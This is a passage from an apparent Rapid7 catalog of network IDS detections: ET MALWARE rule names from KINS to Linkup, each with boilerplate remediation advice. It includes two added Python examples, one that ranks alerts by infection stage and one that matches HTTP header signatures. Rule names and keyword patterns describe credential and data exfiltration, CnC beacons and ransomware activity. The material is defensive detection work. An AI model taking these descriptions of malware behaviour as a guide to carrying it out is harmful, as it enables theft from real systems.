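The recommendation repeated for every entry above (review the alert, rebuild the host, reset the user's password) is easier to act on when alerts from one internal host are grouped and ranked by what the rule name says about the infection stage: a maldoc fetch, a payload download, a CnC check-in or beacon, data exfiltration, or ransomware activity (the last two are what the T1041 and T1486 tags on some entries record). The Python below is an added example, not Rapid7 or Emerging Threats code; the alert line format, the stage keyword heuristic and the hosts and timestamps are constructed for this illustration, while the rule names are taken from this catalog.

```python
"""Group and rank ET MALWARE alerts per internal host.

Added example, not Rapid7 or Emerging Threats code. The alert line format,
the stage keywords and the hosts/timestamps below are constructed for this
illustration; only the rule names come from the catalog.
"""
import re
from collections import defaultdict

# What a rule name says about the infection stage. Order matters: the first
# matching entry wins, so "Ransomware Check-in" is ranked as ransomware rather
# than as a generic check-in. This is the example's own heuristic.
STAGE_KEYWORDS = [
    ("exfiltration", re.compile(r"exfil|sending (windows )?information|sending screenshot", re.I)),
    ("ransomware",   re.compile(r"ransomware", re.I)),
    ("c2",           re.compile(r"\bcnc\b|c&c|check-?in|beacon|keepalive", re.I)),
    ("payload",      re.compile(r"payload|exe (pull|dl)|downloader|download", re.I)),
    ("maldoc",       re.compile(r"maldoc|malicious doc", re.I)),
]
# Higher is more urgent; a host that is already exfiltrating or encrypting
# outranks one that only fetched a payload.
STAGE_PRIORITY = {"ransomware": 4, "exfiltration": 4, "c2": 3,
                  "payload": 2, "maldoc": 1, "unknown": 0}

# Constructed alert line format: "<ts> <src> -> <dst> [<rule name>]"
ALERT_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\d+(?:\.\d+){3}) -> (?P<dst>\d+(?:\.\d+){3}) "
    r"\[ET (?P<cat>[A-Z]+) (?P<msg>.+)\]$"
)

def parse_alert(line):
    """Parse one alert line; returns None for lines that do not fit the format."""
    m = ALERT_RE.match(line.strip())
    if not m:
        return None
    msg = m.group("msg")
    stage = next((name for name, rx in STAGE_KEYWORDS if rx.search(msg)), "unknown")
    return {"ts": m.group("ts"), "src": m.group("src"), "dst": m.group("dst"),
            "category": m.group("cat"), "msg": msg,
            "stage": stage, "priority": STAGE_PRIORITY[stage]}

def triage(lines):
    """Return [(src, worst_stage, alert_count, sorted rule names)], most urgent first.

    Ties on stage are broken by alert count, then by address, so the output is
    deterministic for the same input.
    """
    by_host = defaultdict(list)
    for line in lines:
        alert = parse_alert(line)
        if alert is not None:
            by_host[alert["src"]].append(alert)
    ranked = []
    for src, alerts in by_host.items():
        worst = max(alerts, key=lambda a: a["priority"])
        ranked.append((src, worst["stage"], len(alerts), sorted({a["msg"] for a in alerts})))
    ranked.sort(key=lambda r: (-STAGE_PRIORITY[r[1]], -r[2], r[0]))
    return ranked

# Constructed sample: three internal hosts, rule names taken from this page.
SAMPLE_ALERTS = [
    "2024-05-01T09:12:03Z 10.0.0.21 -> 203.0.113.10 [ET MALWARE Kimsuky Maldoc Activity (GET)]",
    "2024-05-01T09:12:09Z 10.0.0.21 -> 203.0.113.10 [ET MALWARE Kimsuky KGH Backdoor Secondary Payload Download Request]",
    "2024-05-01T09:13:40Z 10.0.0.21 -> 203.0.113.11 [ET MALWARE Kimsuky KGH Backdoor CnC Activity]",
    "2024-05-01T09:30:00Z 10.0.0.35 -> 198.51.100.7 [ET MALWARE Konni RAT Exfiltrating Data]",
    "2024-05-01T09:32:00Z 10.0.0.52 -> 192.0.2.44 [ET MALWARE Kovter Ransomware Check-in]",
]

if __name__ == "__main__":
    for src, stage, count, names in triage(SAMPLE_ALERTS):
        print(f"{src:12} worst={stage:12} alerts={count}")
        for n in names:
            print(f"    {n}")
```

The ordering is the point: the two hosts with a single exfiltration or ransomware alert come out ahead of the host with three alerts that stopped at a CnC check-in, because the stage, not the alert count, decides whether a rebuild is needed now. Keyword matching on rule names is a heuristic; where the sensor exports the ATT&CK technique tags shown on this page, rank on those instead.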

ET MALWARE KINS/ZeusVM Variant Retrieving Config

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kishop.A checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE KLog Nick Keylogger Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Knockbot Proxy Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Knock.php Shiz or Rohimafo CnC Server Contact URL

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Known Malicious Doc Downloading Payload Dec 06 2016

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Known Malicious Expires Header Seen In Malicious JavaScript Downloader Campaign

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Known Sinkhole Response Header

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Known Sinkhole Response Header

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Known Sinkhole Response Header

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Known Sinkhole Response Header

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Known Sinkhole Response Header CERT.PL

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Known Sinkhole Response Header INetSim

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Known Skunkx DDOS Bot User-Agent Cyberdog

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.
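The "Known Sinkhole Response Header" entries (including the CERT.PL and INetSim variants) and the "Skunkx DDOS Bot User-Agent" entry above are the same kind of rule seen from two directions: one inspects a header in the server's reply, the other a header in the client's request. The Python below is an added example of that matching logic, not Rapid7, Emerging Threats or Suricata code; the signature values and the HTTP messages are constructed placeholders and are not the contents of the real rules.

```python
"""Match header-based signatures against raw HTTP messages.

Added example, not Rapid7, Emerging Threats or Suricata code. The signature
values and the HTTP messages are constructed placeholders, not the contents
of the real "Known Sinkhole Response Header" or "Skunkx DDOS Bot User-Agent"
rules.
"""
from dataclasses import dataclass

@dataclass(frozen=True)
class HeaderSig:
    name: str          # alert message to raise
    direction: str     # "request" (client -> server) or "response" (server -> client)
    header: str        # header to inspect; the name is matched case-insensitively
    pattern: str       # text that must appear in the header value
    exact: bool = False  # True: whole value must equal pattern; False: substring

# Constructed placeholder signatures (assumption: not the real rule contents).
SIGS = [
    HeaderSig("SINKHOLE example Server header", "response", "Server",
              "example-sinkhole", exact=True),
    HeaderSig("DDOS bot example User-Agent", "request", "User-Agent",
              "ExampleBot/1.0"),
]

def parse_http(raw: bytes):
    """Split an HTTP/1.x message into (start line, {lower-cased name: value}, body).

    Raises ValueError on a message with no end-of-headers marker or a header
    line without a colon, so callers can tell 'no match' from 'unparseable'.
    """
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            raise ValueError(f"bad header line: {line!r}")
        k, v = line.split(":", 1)
        # Last occurrence wins; a real sensor would flag duplicated headers instead.
        headers[k.strip().lower()] = v.strip()
    return lines[0], headers, body

def direction_of(start_line: str) -> str:
    """A status line starts with the protocol version; a request line does not."""
    return "response" if start_line.startswith("HTTP/") else "request"

def match(raw: bytes):
    """Return the names of all signatures that fire on one HTTP message."""
    start, headers, _ = parse_http(raw)
    direction = direction_of(start)
    hits = []
    for sig in SIGS:
        if sig.direction != direction:
            continue
        value = headers.get(sig.header.lower())
        if value is None:
            continue
        fired = (value == sig.pattern) if sig.exact else (sig.pattern in value)
        if fired:
            hits.append(sig.name)
    return hits

# Constructed traffic samples.
SINKHOLE_RESP = (b"HTTP/1.1 200 OK\r\nServer: example-sinkhole\r\n"
                 b"Content-Type: text/html\r\nContent-Length: 0\r\n\r\n")
BENIGN_RESP = b"HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Length: 0\r\n\r\n"
BOT_REQ = (b"GET /gate.php HTTP/1.1\r\nHost: 198.51.100.7\r\n"
           b"User-Agent: ExampleBot/1.0 (win32)\r\n\r\n")

if __name__ == "__main__":
    for label, msg in [("sinkhole", SINKHOLE_RESP), ("benign", BENIGN_RESP), ("bot", BOT_REQ)]:
        print(label, match(msg))
```

When a sinkhole rule fires, the match is in the reply, so the host to review is the internal client that sent the request, not the server: the server is a sinkhole operated by a researcher or CERT, but the client was still trying to reach a domain that once served a botnet, which is why the rebuild recommendation applies. INetSim is a service-simulation tool used in malware analysis labs, so a hit on that variant outside a sandbox network is worth a look on its own: it usually means analysis traffic is leaving a lab segment it should not leave.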

ET MALWARE Konni RAT Exfiltrating Data

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Konni RAT Querying CnC for Commands

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Konni Stage 2 Payload Exfiltrating Data

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Koobface C&C availability check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Koobface Checkin via POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Koobface HTTP Request (2)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Koobface Trojan HTTP Post Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kovter Ransomware Check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE KPOT Stealer Initial CnC Activity M4

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE KPOT Stealer Initial CnC Activity M5

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kraken Ransomware End Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Kraken Ransomware Start Activity 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Kriptovor Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kriptovor External IP Lookup checkip.dyndns.org

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kriptovor Retrieving RAR Payload

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kronos Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kronos Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kronos Checkin M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kryptik Check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kuluoz Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kuluoz/Asprox Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE L0rdix Stealer CnC Data Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE L0rdix Stealer CnC Sending Screenshot

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LAME SSL Cert APT1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lampion CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LankerBoy HTTP CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Lazarus Downloader (JEUSD) CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Lazarus Maldoc CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE LeChiffre Ransomware CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Legion Loader Activity Observed

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Legion Loader Activity Observed

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Legion Loader Activity Observed (Amen)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Legion Loader Activity Observed (carlos_castaneda)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Legion Loader Activity Observed (heil_moloch)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Legion Loader Activity Observed (heil_satan)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Legion Loader Activity Observed (legion)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Legion Loader Activity Observed (lilith)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Legion Loader Activity Observed (Mylegion666)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Legion Loader Activity Observed (neva-project)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Legion Loader Activity Observed (salmonella-symptome)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Legion Loader Activity Observed (satan)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Legion Loader Activity Observed (suspira)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Legion Loader Activity Observed (the devil)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Legion Loader Activity Observed (YourUserAgent)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lemon_Duck CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lemon_Duck Linux Shell Script CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lemon_Duck Powershell CnC Activity M14

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lemon_Duck Powershell CnC Checkin M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lemon_Duck Powershell CnC Checkin M6

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lemon_Duck Powershell - Install Tracking

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Lemon_Duck Powershell - RDP Credential Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely Arid Viper APT Advtravel Campaign GET Keepalive

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely Arid Viper APT Advtravel Campaign POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely CryptoWall .onion Proxy domain in SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely Evil Macro EXE DL mar 15 2016

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely Evil Macro EXE DL mar 28 2016

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely Evil Request for uac.exe With Minimal Headers

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely Fake Antivirus Download InternetAntivirusPro.exe

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely FakeAV/Fakeinit/FraudLoad Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely FakeAV/Fakeinit/FraudLoad Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely FakeAV/Fakeinit/FraudLoad Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely GandCrab Ransomware Domain in HTTP Host M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Likely GandCrab Ransomware Domain in HTTP Host M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Likely Geodo/Emotet CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Likely Geodo/Emotet Downloading PE

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely Geodo/Emotet Downloading PE

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely Geodo/Emotet Downloading PE - Fake UA

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely Infected HTTP POST to PHP with User-Agent of HTTP Client

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely Koobface Beaconing (getexe)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Likely Malicious Windows SCT Download MSXMLHTTP M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely Malicious Windows SCT Download MSXMLHTTP M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely Malicious Windows SCT Download MSXMLHTTP M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely Malware CnC Hosted on 000webhostapp - POST to gate.php

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likely PadCrypt Locker PKG DL

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Likseput.B Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Limitless Logger RAT HTTP Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Linkup Ransomware check-in

Description

